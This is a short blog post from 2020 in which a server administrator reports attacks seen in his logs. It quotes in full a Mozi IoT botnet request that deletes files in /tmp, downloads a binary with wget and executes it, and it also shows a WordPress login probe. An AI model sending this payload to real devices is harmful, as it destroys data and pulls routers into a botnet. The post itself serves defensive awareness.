Fighting Web Hackers

by Ed Sawicki - May 30, 2020

I check my webserver logs numerous times a day. I noticed this earlier, coming from Seoul, South Korea:

49.143.32.6 - GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 404

It's called a Mozi IoT Botnet attack. It's an atack against the Internet of Things. It's trying to break-in to my router and make it part of a botnet. The attacker doesn't know that my router is not vulnerable—but it will work on those that are. As of April 16, 2020, there are over 15,850 routers that have become part of the botnet. What do they do? They follow the directions given to them by those who run the botnet. The Mozi, Another Botnet Using DHT article has a table of devices that are targets of the attack.

There's little I can do except block their ip addresses at my firewall. I can try to slow them down by sending a redirect to localhost, telling them that my website has moved to their own internal ip address. I'll never know if that works but I hope that it does and confuses them. Experienced bot builders would be too smart to have their critters fall for that old trick.

The vast majority of attacks that I see in my logs are login attempts to a Word Press server as in this example coming from Paris, France:

91.121.183.15 - GET /wp-login.php HTTP/1.1 404

My server doesn't run Word Press and it doesn't run PHP—it doesn't run any popular framework—so these are not at all a threat, but the attackers don't know that. Sometimes, I build a simulated environment for them to attack so I can see what they do. Expert hackers won't be fooled by this simulation but some will.

Sources

Mozi, Another Botnet Using DHT